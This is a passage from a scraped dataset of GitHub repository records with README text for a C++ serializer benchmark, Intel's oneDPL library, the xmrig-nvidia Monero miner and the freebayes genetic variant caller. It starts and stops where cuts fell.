[Thrift](http://thrift.apache.org/)\n* [Protobuf](https://code.google.com/p/protobuf/)\n* [Boost.Serialization](http://www.boost.org/libs/serialization)\n* [Msgpack](http://msgpack.org/)\n* [Cereal](http://uscilab.github.io/cereal/index.html)\n* [Avro](http://avro.apache.org/)\n* [Capnproto](https://capnproto.org/)\n* [Flatbuffers](https://google.github.io/flatbuffers/)\n* [YAS](https://github.com/niXman/yas)\n\n# Build\n\nThis project does not have any external serialization libraries dependencies. All (boost, thrift etc.) needed libraries are downloaded and built automatically, but you need enough free disk space (approx. 2.3G) to build all components. To build this project you need a compiler that supports C++14 features. Project was tested with Clang and GCC compilers.\n\n1. `git clone https://github.com/thekvs/cpp-serializers.git`\n1. `cd cpp-serializers`\n1. `mkdir build`\n1. `cd build`\n1. `cmake -DCMAKE_BUILD_TYPE=Release ..`\n1. `cmake --build .`\n\n# Usage\n\n```\n$ ./benchmark -h\nBenchmark various C++ serializers\nUsage:\n benchmark [OPTION...]\n\n -h, --help show this help and exit\n -l, --list show list of supported serializers\n -c, --csv output in CSV format\n -i, --iterations arg number of serialize/deserialize iterations\n -s, --serializers arg comma separated list of serializers to benchmark\n```\n\n* Benchmark **all** serializers, run each serializer 100000 times:\n```\n$ ./benchmark -i 100000\n```\n* Benchmark only **protobuf** serializer, run it 100000 times:\n```\n$ ./benchmark -i 100000 -s protobuf\n```\n* Benchmark **protobuf** and **cereal** serializers only, run each of them 100000 times:\n```\n$ ./benchmark -i 100000 -s protobuf,cereal\n```\n\n# Results\n\nFollowing results were obtained running 1000000 serialize-deserialize operations 50 times and then averaging results on a typical desktop computer with Intel Core i7 processor running Ubuntu 16.04. Exact versions of libraries used are:\n\n* thrift 0.12.0\n* protobuf 3.7.0\n* boost 1.69.0\n* msgpack 3.1.1\n* cereal 1.2.2\n* avro 1.8.2\n* capnproto 0.7.0\n* flatbuffers 1.10.0\n* YAS 7.0.2\n\n| serializer | object's size | avg. total time |\n| -------------- | ------------- | --------------- |\n| thrift-binary | 17017 | 1190.22 |\n| thrift-compact | 13378 | 3474.32 |\n| protobuf | 16116 | 2312.78 |\n| boost | 17470 | 1195.04 |\n| msgpack | 13402 | 2560.6 |\n| cereal | 17416 | 1052.46 |\n| avro | 16384 | 4488.18 |\n| yas | 17416 | 302.7 |\n| yas-compact | 13321 | 2063.34 |\n\n\n## Size\n\n![Size](images/size.png)\n\n## Time\n\n![Time](images/time.png)\n\nFor capnproto and flatbuffers since they already store data in a \"serialized\" form and serialization basically means getting pointer to the internal storage, we measure full **build**/serialize/deserialize cycle. In the case of other libraries we measure serialize/deserialize cycle of the already built data structure.\n\n| serializer | object's size | avg. total time |\n| -------------- | ------------- | --------------- |\n| capnproto | 17768 | 400.98 |\n| flatbuffers | 17632 | 491.5 |\n\n![Time](images/time2.png)\n\nSize measured in bytes, time measured in milliseconds.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "oneapi-src/oneDPL", "link": "https://github.com/oneapi-src/oneDPL", "tags": ["oneapi"], "stars": 656, "description": "oneAPI DPC++ Library (oneDPL) https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/dpc-library.html ", "lang": "C++", "repo_lang": "", "readme": "![](https://spec.oneapi.io/oneapi-logo-white-scaled.jpg)\n\noneDPL is part of [oneAPI](https://oneapi.io)\n# oneAPI DPC++ Library (oneDPL)\n\noneAPI DPC++ Library (oneDPL) works with the Intel\u00ae oneAPI DPC++/C++ Compiler to\nprovide high-productivity APIs to developers, which can minimize Data Parallel C++ (DPC++)\nprogramming efforts across devices for high performance parallel applications.\n\n## Prerequisites\nInstall the Intel\u00ae oneAPI Base Toolkit (Base Kit) to use oneDPL. Refer to the specific\n[system requirements](https://software.intel.com/content/www/us/en/develop/articles/intel-oneapi-dpcpp-system-requirements.html)\nfor more information.\n\n## Release Information\nVisit the latest [Release Notes](https://github.com/oneapi-src/oneDPL/blob/main/documentation/release_notes.rst).\n\n## License\noneDPL is licensed under [Apache License Version 2.0 with LLVM exceptions](https://github.com/oneapi-src/oneDPL/blob/release_oneDPL/licensing/LICENSE.txt).\nRefer to the [LICENSE](licensing/LICENSE.txt) file for the full license text and copyright notice.\n\n## Security\nSee the [Intel Security Center](https://www.intel.com/content/www/us/en/security-center/default.html)\nfor information on how to report a potential security issue or vulnerability.\nYou can also view the [Security Policy](SECURITY.md).\n\n## Contributing\nSee [CONTRIBUTING.md](https://github.com/oneapi-src/oneDPL/blob/release_oneDPL/CONTRIBUTING.md) for details.\n\n## Documentation\n\nSee the full documentation set for [oneDPL](https://oneapi-src.github.io/oneDPL).\n\n## Samples\nYou can find oneDPL samples at the [oneDPL Samples](https://github.com/oneapi-src/oneAPI-samples/tree/master/Libraries/oneDPL) page.\n\n## Support and Contribution\nPlease report issues and suggestions via [GitHub issues](https://github.com/oneapi-src/oneDPL/issues).\n\n------------------------------------------------------------------------\nIntel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the U.S. and/or other countries.\n\n\\* Other names and brands may be claimed as the property of others.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xmrig/xmrig-nvidia", "link": "https://github.com/xmrig/xmrig-nvidia", "tags": ["monero", "xmr", "gpu-mining", "nvidia-miner", "aeon", "xmrig", "cuda", "electroneum", "sumokoin", "cryptonight"], "stars": 655, "description": "Monero (XMR) NVIDIA miner", "lang": "C++", "repo_lang": "", "readme": "# XMRig NVIDIA\n\n[![Github All Releases](https://img.shields.io/github/downloads/xmrig/xmrig-nvidia/total.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub release](https://img.shields.io/github/release/xmrig/xmrig-nvidia/all.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub Release Date](https://img.shields.io/github/release-date-pre/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub license](https://img.shields.io/github/license/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/blob/master/LICENSE)\n[![GitHub stars](https://img.shields.io/github/stars/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/network)\n\nXMRig is high performance Monero (XMR) NVIDIA miner, with the official full Windows support.\n\nGPU mining part based on [psychocrypt](https://github.com/psychocrypt) code used in xmr-stak-nvidia.\n\n* This is the **NVIDIA GPU** mining version, there is also a [CPU version](https://github.com/xmrig/xmrig) and [AMD GPU version]( https://github.com/xmrig/xmrig-amd).\n* [Roadmap](https://github.com/xmrig/xmrig/issues/106) for next releases.\n\n:warning: Suggested values for GPU auto configuration can be not optimal or not working, you may need tweak your threads options. Please feel free open an [issue](https://github.com/xmrig/xmrig-nvidia/issues) if auto configuration suggest wrong values.\n\n\n\n#### Table of contents\n* [Features](#features)\n* [Download](#download)\n* [Usage](#usage)\n* [Build](https://github.com/xmrig/xmrig-nvidia/wiki/Build)\n* [Donations](#donations)\n* [Release checksums](#release-checksums)\n* [Contacts](#contacts)\n\n## Features\n* High performance.\n* Official Windows support.\n* Support for backup (failover) mining server.\n* CryptoNight-Lite support for AEON.\n* Automatic GPU configuration.\n* GPU health monitoring (clocks, power, temperature, fan speed) \n* Nicehash support.\n* It's open source software.\n\n## Download\n* Binary releases: https://github.com/xmrig/xmrig-nvidia/releases\n* Git tree: https://github.com/xmrig/xmrig-nvidia.git\n * Clone with `git clone https://github.com/xmrig/xmrig-nvidia.git` :hammer: [Build instructions](https://github.com/xmrig/xmrig-nvidia/wiki/Build).\n\n## Usage\nUse [config.xmrig.com](https://config.xmrig.com/nvidia) to generate, edit or share configurations.\n\n### Command line options\n```\n -a, --algo=ALGO specify the algorithm to use\n cryptonight\n cryptonight-lite\n cryptonight-heavy\n -o, --url=URL URL of mining server\n -O, --userpass=U:P username:password pair for mining server\n -u, --user=USERNAME username for mining server\n -p, --pass=PASSWORD password for mining server\n --rig-id=ID rig identifier for pool-side statistics (needs pool support)\n -k, --keepalive send keepalived packet for prevent timeout (needs pool support)\n --nicehash enable nicehash.com support\n --tls enable SSL/TLS support (needs pool support)\n --tls-fingerprint=F pool TLS certificate fingerprint, if set enable strict certificate pinning\n -r, --retries=N number of times to retry before switch to backup server (default: 5)\n -R, --retry-pause=N time to pause between retries (default: 5)\n --cuda-devices=N list of CUDA devices to use.\n --cuda-launch=TxB list of launch config for the CryptoNight kernel\n --cuda-max-threads=N limit maximum count of GPU threads in automatic mode\n --cuda-bfactor=[0-12] run CryptoNight core kernel in smaller pieces\n --cuda-bsleep=N insert a delay of N microseconds between kernel launches\n --cuda-affinity=N affine GPU threads to a CPU\n --no-color disable colored output\n --variant algorithm PoW variant\n --donate-level=N donate level, default 5% (5 minutes in 100 minutes)\n --user-agent set custom user-agent string for pool\n -B, --background run the miner in the background\n -c, --config=FILE load a JSON-format configuration file\n -l, --log-file=FILE log all output to a file\n -S, --syslog use system log for output messages\n --print-time=N print hashrate report every N seconds\n --api-port=N port for the miner API\n --api-access-token=T access token for API\n --api-worker-id=ID custom worker-id for API\n --api-id=ID custom instance ID for API\n --api-ipv6 enable IPv6 support for API\n --api-no-restricted enable full remote access (only if API token set)\n --dry-run test configuration and exit\n -h, --help display this help and exit\n -V, --version output version information and exit\n```\n\n## Donations\nDefault donation 5% (5 minutes in 100 minutes) can be reduced to 1% via command line option `--donate-level`.\n\n* XMR: `48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD`\n* BTC: `1P7ujsXeX7GxQwHNnJsRMgAdNkFZmNVqJT`\n\n## Contacts\n* support@xmrig.com\n* [reddit](https://www.reddit.com/user/XMRig/)\n* [twitter](https://twitter.com/xmrig_dev)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "freebayes/freebayes", "link": "https://github.com/freebayes/freebayes", "tags": [], "stars": 655, "description": "Bayesian haplotype-based genetic polymorphism discovery and genotyping.", "lang": "C++", "repo_lang": "", "readme": "# *freebayes*, a haplotype-based variant detector\n## user manual and guide\n\n\n[![Github-CI](https://github.com/freebayes/freebayes/workflows/CI/badge.svg)](https://github.com/freebayes/freebayes/actions) [![Travis-CI](https://travis-ci.com/freebayes/freebayes.svg?branch=master)](https://travis-ci.com/freebayes/freebayes) [![AnacondaBadge](https://anaconda.org/bioconda/freebayes/badges/installer/conda.svg)](https://anaconda.org/bioconda/freebayes) [![DL](https://anaconda.org/bioconda/freebayes/badges/downloads.svg)](https://anaconda.org/bioconda/freebayes) [![BrewBadge](https://img.shields.io/badge/%F0%9F%8D%BAbrew-freebayes-brightgreen.svg)](https://github.com/brewsci/homebrew-bio) [![GuixBadge](https://img.shields.io/badge/gnuguix-freebayes-brightgreen.svg)](https://www.gnu.org/software/guix/packages/F/) [![DebianBadge](https://badges.debian.net/badges/debian/testing/freebayes/version.svg)](https://packages.debian.org/testing/freebayes) [![Chat on Matrix](https://matrix.to/img/matrix-badge.svg)](https://matrix.to/#/#vcflib:matrix.org)\n--------\n\n## Overview\n\n[*freebayes*](http://arxiv.org/abs/1207.3907) is a\n[Bayesian](http://en.wikipedia.org/wiki/Bayesian_inference) genetic variant\ndetector designed to find small polymorphisms, specifically SNPs\n(single-nucleotide polymorphisms), indels (insertions and deletions), MNPs\n(multi-nucleotide polymorphisms), and complex events (composite insertion and\nsubstitution events) smaller than the length of a short-read sequencing\nalignment.\n\n*freebayes* is haplotype-based, in the sense that it calls variants based on\nthe literal sequences of reads aligned to a particular target, not their\nprecise alignment. This model is a straightforward generalization of previous\nones (e.g. PolyBayes, samtools, GATK) which detect or report variants based on\nalignments. This method avoids one of the core problems with alignment-based\nvariant detection--- that identical sequences may have multiple possible\nalignments:\n\n\n\n*freebayes* uses short-read alignments\n([BAM](http://samtools.sourceforge.net/SAMv1.pdf) files with\n[Phred+33](http://en.wikipedia.org/wiki/Phred_quality_score) encoded quality\nscores, now standard) for any number of individuals from a population and a\n[reference genome](http://en.wikipedia.org/wiki/Reference_genome) (in\n[FASTA](http://en.wikipedia.org/wiki/FASTA_format) format)\nto determine the most-likely combination of genotypes for the population at\neach position in the reference. It reports positions which it finds putatively\npolymorphic in variant call file ([VCF](http://www.1000genomes.org/node/101))\nformat. It can also use an input set of variants (VCF) as a source of prior\ninformation, and a copy number variant map (BED) to define non-uniform ploidy\nvariation across the samples under analysis.\n\nfreebayes is maintained by Erik Garrison and Pjotr Prins. See also [RELEASE-NOTES](./RELEASE-NOTES.md).\n\n## Citing freebayes\n\nA preprint [Haplotype-based variant detection from short-read sequencing](http://arxiv.org/abs/1207.3907) provides an overview of the\nstatistical models used in freebayes.\nWe ask that you cite this paper if you use freebayes in work that leads to publication.\nThis preprint is used for documentation and citation.\nfreebayes was never submitted for review, but has been used in over 1000 publications.\n\nPlease use this citation format:\n\nGarrison E, Marth G. Haplotype-based variant detection from short-read sequencing. *arXiv preprint arXiv:1207.3907 [q-bio.GN]* 2012\n\nIf possible, please also refer to the version number provided by freebayes when it is run without arguments or with the `--help` option.\n\n## Install\n\nfreebayes is provided as a pre-built 64-bit static Linux binary as part of [releases](https://github.com/freebayes/freebayes/releases).\n\nDebian and Conda packages should work too, see the badges at the top\nof this page.\n\nTo build freebayes from source check the\n[development](#Development) section below. It is important to get the full recursive\ngit checkout and dependencies.\n\n## Support\n\nPlease report any issues or questions to the [freebayes mailing list](https://groups.google.com/forum/#!forum/freebayes). Report bugs on the [freebayes issue tracker](https://github.com/freebayes/freebayes/issues)\n\n## Usage\n\nIn its simplest operation, freebayes requires only two inputs: a FASTA reference sequence, and a BAM-format alignment file sorted by reference position.\nFor instance:\n\n freebayes -f ref.fa aln.bam >var.vcf\n\n... will produce a VCF file describing all SNPs, INDELs, and haplotype variants between the reference and aln.bam. The CRAM version is\n\n freebayes -f ref.fa aln.cram >var.vcf\n\nMultiple BAM files may be given for joint calling.\n\nTypically, we might consider two additional parameters.\nGVCF output allows us to have coverage information about non-called sites, and we can enable it with `--gvcf`.\nFor performance reasons we may want to skip regions of extremely high coverage in the reference using the `--skip-coverage` parameter or `-g`.\nThese can greatly increase runtime but do not produce meaningful results.\nFor instance, if we wanted to exclude regions of 1000X coverage, we would run:\n\n freebayes -f ref.fa aln.bam --gvcf -g 1000 >var.vcf\n\nFor a description of available command-line options and their defaults, run:\n\n freebayes --help\n\n## Examples\n\nCall variants assuming a diploid sample:\n\n freebayes -f ref.fa aln.bam >var.vcf\n\nCall variants on only chrQ:\n\n freebayes -f ref.fa -r chrQ aln.bam >var.vcf\n\nCall variants on only chrQ, from position 1000 to 2000:\n\n freebayes -f ref.fa -r chrQ:1000-2000 aln.bam >var.vcf\n\nRequire at least 5 supporting observations to consider a variant:\n\n freebayes -f ref.fa -C 5 aln.bam >var.vcf\n\nSkip over regions of high depth by discarding alignments overlapping positions where total read depth is greater than 200:\n\n freebayes -f ref.fa -g 200 aln.bam >var.vcf\n\nUse a different ploidy:\n\n freebayes -f ref.fa -p 4 aln.bam >var.vcf\n\nAssume a pooled sample with a known number of genome copies. Note that this\nmeans that each sample identified in the BAM file is assumed to have 32 genome\ncopies. When running with high --ploidy settings, it may be required to set\n`--use-best-n-alleles` to a low number to limit memory usage.\n\n freebayes -f ref.fa -p 32 --use-best-n-alleles 4 --pooled-discrete aln.bam >var.vcf\n\nGenerate frequency-based calls for all variants passing input thresholds. You'd do\nthis in the case that you didn't know the number of samples in the pool.\n\n freebayes -f ref.fa -F 0.01 -C 1 --pooled-continuous aln.bam >var.vcf\n\nUse an input VCF (bgzipped + tabix indexed) to force calls at particular alleles:\n\n freebayes -f ref.fa -@ in.vcf.gz aln.bam >var.vcf\n\nGenerate long haplotype calls over known variants:\n\n freebayes -f ref.fa --haplotype-basis-alleles in.vcf.gz \\\n --haplotype-length 50 aln.bam\n\nNaive variant calling: simply annotate observation counts of SNPs and indels:\n\n freebayes -f ref.fa --haplotype-length 0 --min-alternate-count 1 \\\n --min-alternate-fraction 0 --pooled-continuous --report-monomorphic >var.vcf\n\n## Parallelisation\n\nIn general, freebayes can be parallelised by running multiple instances of freebayes on separate regions of the genome, and then concatenating the resulting output.\nThe wrapper, [freebayes-parallel](https://github.com/ekg/freebayes/blob/master/scripts/freebayes-parallel) will perform this, using [GNU parallel](https://www.gnu.org/software/parallel/).\n\nExample freebayes-parallel operation (use 36 cores in this case):\n\n freebayes-parallel <(fasta_generate_regions.py ref.fa.fai 100000) 36 \\\n -f ref.fa aln.bam > var.vcf\n\nNote that any of the above examples can be made parallel by using the\nscripts/freebayes-parallel script. If you find freebayes to be slow, you\nshould probably be running it in parallel using this script to run on a single\nhost, or generating a series of scripts, one per region, and run them on a\ncluster. Be aware that the freebayes-parallel script contains calls to other programs using relative paths from the scripts subdirectory; the easiest way to ensure a successful run is to invoke the freebayes-parallel script from within the scripts subdirectory.\n\nA current limitation of the freebayes-parallel wrapper, is that due to variance in job memory and runtimes, some cores can go unused for long periods, as they will not move onto the next job unless all cores in use have completed their respective genome chunk. This can be partly avoided by calculating coverage of the input bam file, and splitting the genome into regions of equal coverage using the [coverage_to_regions.py script](https://github.com/freebayes/freebayes/blob/master/scripts/coverage_to_regions.py). An alternative script [split_ref_by_bai_datasize.py](https://github.com/freebayes/freebayes/blob/master/scripts/split_ref_by_bai_datasize.py) will determine target regions based on the data within multiple bam files, with the option of choosing a target data size. This is useful when submitting to Slurm and other cluster job managers, where use of resources needs to be controlled.\n\nAlternatively, users may wish to parallelise freebayes within the workflow manager [snakemake](https://snakemake.readthedocs.io/en/stable/). As snakemake automatically dispatches jobs when a core becomes available, this avoids the above issue. An example [.smk file](https://github.com/freebayes/freebayes/blob/master/examples/snakemake-freebayes-parallel.smk), and associated [conda environment recipe](https://github.com/freebayes/freebayes/blob/master/examples/freebayes-env.yaml), can be found in the /examples directory.\n\n## Calling variants: from fastq to VCF\n\nYou've sequenced some samples. You have a reference genome or assembled set of\ncontigs, and you'd like to determine reference-relative variants in your\nsamples. You can use freebayes to detect the variants, following these steps:\n\n* **Align** your reads to a suitable reference (e.g. with\n[bwa](http://bio-bwa.sourceforge.net/) or\n[MOSAIK](https://github.com/wanpinglee/MOSAIK))\n* Ensure your alignments have **read groups** attached so their sample may be\nidentified by freebayes. Aligners allow you to do this, but you can also use\n[bamaddrg](http://github.com/ekg/bamaddrg) to do so post-alignment.\n* **Sort** the alignments (e.g. [sambamba sort](https://github.com/biod/sambamba)).\n* **Mark duplicates**, for instance with [sambamba markdup](https://github.com/biod/sambamba) (if PCR was used in the preparation of your sequencing library)\n* ***Run freebayes*** on all your alignment data simultaneously, generating a\nVCF. The default settings should work for most use cases, but if your samples\nare not diploid, set the `--ploidy` and adjust the `--min-alternate-fraction`\nsuitably.\n* **Filter** the output e.g. using reported QUAL and/or depth (DP) or\nobservation count (AO).\n* **Interpret** your results.\n* (possibly, **Iterate** the variant detection process in response to insight\ngained from your interpretation)\n\nfreebayes emits a standard VCF 4.1 output stream. This format is designed for the\nprobabilistic description of allelic variants within a population of samples,\nbut it is equally suited to describing the probability of variation in a single\nsample.\n\nOf primary interest to most users is the QUAL field, which estimates the\nprobability that there is a polymorphism at the loci described by the record.\nIn freebayes, this value can be understood as 1 - P(locus is homozygous given\nthe data). It is recommended that users use this value to filter their\nresults, rather than accepting anything output by freebayes as ground truth.\n\nBy default, records are output even if they have very low probability of\nvariation, in expectation that the VCF will be filtered using tools such as\n[vcffilter](http://github.com/ekg/vcflib#vcffilter) in\n[vcflib](http://github.com/ekg/vcflib), which is also included in the\nrepository under `vcflib/`. For instance,\n\n freebayes -f ref.fa aln.bam | vcffilter -f \"QUAL > 20\" >results.vcf\n\nremoves any sites with estimated probability of not being polymorphic less than\nphred 20 (aka 0.01), or probability of polymorphism > 0.99.\n\nIn simulation, the [receiver-operator\ncharacteristic](https://en.wikipedia.org/wiki/Receiver_operating_characteristic)\n (ROC) tends to have a very sharp inflection between Q1 and Q30, depending on\ninput data characteristics, and a filter setting in this range should provide\ndecent performance. Users are encouraged to examine their output and both\nvariants which are retained and those they filter out. Most problems tend to\noccur in low-depth areas, and so users may wish to remove these as well, which\ncan also be done by filtering on the DP flag.\n\n\n## Calling variants in a population\n\nfreebayes is designed to be run on many individuals from the same population\n(e.g. many human individuals) simultaneously. The algorithm exploits a neutral\nmodel of allele diffusion to impute most-confident genotypings\nacross the entire population. In practice, the discriminant power of the\nmethod will improve if you run multiple samples simultaneously. In other\nwords, if your\nstudy has multiple individuals, you should run freebayes against them at the\nsame time. This also ensures consistent reporting of information about\nevidence for all samples at any locus where any are apparently polymorphic.\n\nTo call variants in a population of samples, each alignment must have a read\ngroup identifier attached to it (RG tag), and the header of the BAM file in\nwhich it resides must map the RG tags to sample names (SM). Furthermore, read\ngroup IDs must be unique across all the files used in the analysis. One read\ngroup cannot map to multiple samples. The reason this is required is that\nfreebayes operates on a virtually merged BAM stream provided by the BamTools\nAPI. If merging the files in your analysis using bamtools merge would generate\na file in which multiple samples map to the same RG, the files are not suitable\nfor use in population calling, and they must be modified.\n\nUsers may add RG tags to BAM files which were generated without this\ninformation by using (as mentioned in \"Calling variants\" above)\n[bamaddrg](http://github.com/ekg/bamaddrg).\nIf you have many files corresponding to\nmany individuals, add a unique read group and sample name to each, and then\nopen them all simultaneously with freebayes. The VCF output will have one\ncolumn per sample in the input.\n\n\n## Performance tuning\n\nIf you find freebayes to be slow, or use large amounts of memory, consider the\nfollowing options:\n\n- Set `--use-best-n-alleles 4`: this will reduce the number of alleles that are\n considered, which will decrease runtime at the cost of sensitivity to\nlower-frequency alleles at multiallelic loci. Calculating site qualities\nrequires O(samples\\*genotypes) runtime, and the number of genotypes is\nexponential in ploidy and the number of alleles that are considered, so this is\nvery important when working with high ploidy samples (and also\n`--pooled-discrete`). By default, freebayes puts no limit on this.\n\n- Remove `--genotype-qualities`: calculating genotype qualities requires\n O(samples\\*genotypes) memory.\n\n- Set higher input thresholds. Require that N reads in one sample support an\n allele in order to consider it: `--min-alternate-count N`, or that the allele\nfraction in one sample is M: `--min-alternate-fraction M`. This will filter\nnoisy alleles. The defaults, `--min-alternate-count 2 --min-alternate-fraction\n0.2`, are most-suitable for diploid, moderate-to-high depth samples, and should\nbe changed when working with different ploidy samples. Alternatively,\n`--min-alternate-qsum` can be used to set a specific quality sum, which may be\nmore flexible than setting a hard count on the number of observations.\n\n\n## Observation filters and qualities\n\n### Input filters\n\nBy default, freebayes doesn't\n\nfreebayes may be configured to filter its input so as to ignore low-confidence alignments and alleles which are only supported by low-quality sequencing observations (see `--min-mapping-quality` and `--min-base-quality`).\nIt also will only evaluate a position if at least one read has mapping quality of `--min-supporting-mapping-quality` and one allele has quality of at least `--min-supporting-base-quality`.\n\nReads with more than a fixed number of high-quality mismatches can be excluded by specifying `--read-mismatch-limit`.\nThis is meant as a workaround when mapping quality estimates are not appropriately calibrated.\n\nReads marked as duplicates in the BAM file are ignored, but this can be disabled for testing purposes by providing `--use-duplicate-reads`.\nfreebayes does not mark duplicates on its own, you must use another process to do this, such as that in [sambamba](https://github.com/biod/sambamba).\n\n### Observation thresholds\n\nAs a guard against spurious variation caused by sequencing artifacts, positions are skipped when no more than `--min-alternate-count` or `--min-alternate-fraction` non-clonal observations of an alternate are found in one sample.\nThese default to 2 and 0.05 respectively.\nThe default setting of `--min-alternate-fraction 0.05` is suitable for diploid samples but may need to be changed for higher ploidy.\n\n### Allele type exclusion\nfreebayes provides a few methods to ignore certain classes of allele, e.g.\n`--throw-away-indels-obs` and `--throw-awary-mnps-obs`. Users are *strongly cautioned against using\nthese*, because removing this information is very likely to reduce detection\npower. To generate a report only including SNPs, use vcffilter post-call as\nsuch:\n\n freebayes ... | vcffilter -f \"TYPE = snp\"\n\n### Normalizing variant representation\n\nIf you wish to obtain a VCF that does not contain haplotype calls or complex alleles, first call with default parameters and then decompose the output with tools in vcflib, vt, vcf-tools, bcftools, GATK, or Picard.\nHere we use a tool in vcflib that normalizes the haplotype calls into pointwise SNPs and indels:\n\n freebayes ... | vcfallelicprimitives -kg >calls.vcf\n\nNote that this is not done by default as it makes it difficult to determine which variant calls freebayes completed.\nThe raw output faithfully describes exactly the calls that were made.\n\n### Observation qualities\n\nfreebayes estimates observation quality using several simple heuristics based\non manipulations of the phred-scaled base qualities:\n\n* For single-base observations, *mismatches* and *reference observations*: the\nun-adjusted base quality provided in the BAM alignment record.\n* For *insertions*: the mean quality of the bases inside of the putatively\ninserted sequence.\n* For *deletions*: the mean quality of the bases flanking the putatively\ndeleted sequence.\n* For *haplotypes*: the mean quality of allele observations within the\nhaplotype.\n\nBy default, both base and mapping quality are into the reported site quality (QUAL in the VCF) and genotype quality (GQ, when supplying `--genotype-qualities`).\nThis integration is driven by the \"Effective Base Depth\" metric first developed in [snpTools](http://www.hgsc.bcm.edu/software/snptools), which scales observation quality by mapping quality: *P(Obs|Genotype) ~ P(MappedCorrectly(Obs))P(SequencedCorrectly(Obs))*.\nSet `--standard-gls` to use the model described in the freebayes preprint.\n\n## Stream processing\n\nfreebayes can read BAM from standard input `--stdin` instead of directly from\nfiles. This allows the application of any number of streaming BAM filters and\ncalibrators to its input.\n\n bam_merger.sh | streaming_filter_or_process.sh | freebayes --stdin ...\n\nThis pattern allows the adjustment of alignments without rewriting BAM files,\nwhich could be expensive depending on context and available storage. A prime\nexample of this would be graph-based realignment of reads to known variants as\nimplemented in [glia](http://github.com/ekg/glia).\n\nUsing this pattern, you can filter out reads with certain criteria using\nbamtools filter without having to modify the input BAM file. You can also use\nthe bamtools API to write your own custom filters in C++. An example filter is\nbamfiltertech\n[src/bamfiltertech.cpp](http://github.com/freebayes/freebayes/blob/master/src/bamfilte\nrtech.cpp), which could be used to filter out\ntechnologies which have characteristic errors which may frustrate certain types\nof variant detection.\n\n## INDELs\n\nIn principle, any gapped aligner which is sensitive to indels will\nproduce satisfactory input for use by freebayes. Due to potential ambiguity,\nindels are\nnot parsed when they overlap the beginning or end of alignment boundaries.\n\nWhen calling indels, it is important to homogenize the positional distribution\nof insertions and deletions in the input by using left realignment. This is\nnow done automatically by freebayes, but the behavior can be turned off via\n`--dont-left-align-indels` flag. You probably don't want to do this.\n\nLeft realignment will place all indels in homopolymer and microsatellite\nrepeats at the same position, provided that doing so does not introduce\nmismatches between the read and reference other than the indel. This method\ncomputationally inexpensive and handles the most common classes of alignment\ninconsistency.\n\n## Haplotype calls\n\nAs freebayes is haplotype-based, left-alignment is necessary only for the\ndetermination of candidate polymorphic loci. Once such loci are determined,\nhaplotype observations are extracted from reads where:\n\n1. putative variants lie within `--haplotype-length` bases of each other\n(default 3bp),\n2. the reference sequence has repeats (e.g. microsatellites or STRs are called\nas one haplotype),\n3. the haplotype which is called has Shannon entropy less than\n`--min-repeat-entropy`, which is off by default but can be set to ~1 for\noptimal genotyping of indels in lower-complexity sequence.\n\nAfter a haplotype window is determined by greedily expanding the window across\noverlapping haplotype observations, all reads overlapping the window are used\nto establish data likelihoods, *P(Observations|Genotype)*, for all haplotypes\nwhich have sufficient support to pass the input filters.\n\nPartial observations are considered to support those haplotypes which they\ncould match exactly. For expedience, only haplotypes which are contiguously\nobserved by the reads are considered as putative alleles in this process. This\ndiffers from other haplotype-based methods, such as\n[Platypus](http://www.well.ox.ac.uk/platypus), which consider all possible\nhaplotypes composed of observed component alleles (SNPs, indels) in a given\nregion when generating likelihoods.\n\nThe primary adantages of this approach are conceptual simplicity and\nperformance, and it is primarily limited in the case of short reads, an issue\nthat is mitigated by increasing read lengths. Also, a hybrid approach must be\nused to call haplotypes from high-error rate long reads.\n\n### Re-genotyping known variants and calling long haplotypes\n\nFor longer reads with higher error rates, it is possible to generate long\nhaplotypes in two passes over the data. For instance, if we had very long\nreads (e.g. >10kb) at moderate depth and high error rate (>5%) such as might be\nproduced by PacBio, we could do something like:\n\n freebayes -f ref.fa aln.bam | vcffilter -f \"QUAL > 20\" >vars.vcf\n\n... thus generating candidate variants of suitable quality using the default\ndetection window. We can then use these as \"basis alleles\" for the observation\nof haplotypes, considering all other putative variants supported by the\nalignment to be sequencing errors:\n\n freebayes -f ref.fa --haplotype-length 500 \\\n --haplotype-basis-alleles vars.vcf aln.bam >haps.vcf\n\nThese steps should allow us to read long haplotypes directly from input data\nwith high error rates.\n\nThe high error rate means that beyond a small window each read will contain a\ncompletely different literal haplotype. To a point, this property improves our\nsignal to noise ratio and can effectively filter out sequencing errors at the\npoint of the input filters, but it also decreases the effective observation\ndepth will prevent the generation of any calls if a long `--haplotype-length`\nis combined with high a sequencing error rate.\n\n\n## Best practices and design philosophy\n\nfreebayes follows the patterns suggested by the [Unix philosophy](https://en.wikipedia.org/wiki/Unix_philosophy), which promotes the development of simple, modular systems that perform a single function, and can be combined into more complex systems using stream processing of common interchange formats.\n\nfreebayes incorporates a number of features in order to reduce the complexity of variant detection for researchers and developers:\n\n* **Indel realignment is accomplished internally** using a read-independent method, and issues resulting from discordant alignments are dramatically reducedy through the direct detection of haplotypes.\n* The need for **base quality recalibration is avoided** through the direct detection of haplotypes. Sequencing platform errors tend to cluster (e.g. at the ends of reads), and generate unique, non-repeating haplotypes at a given locus.\n* **Variant quality recalibration is avoided** by incorporating a number of metrics, such as read placement bias and allele balance, directly into the Bayesian model. (Our upcoming publication will discuss this in more detail.)\n\nA minimal pre-processing pipeline similar to that described in \"Calling variants\" should be sufficient for most uses.\nFor more information, please refer to a post by Brad Chapman [on minimal BAM preprocessing 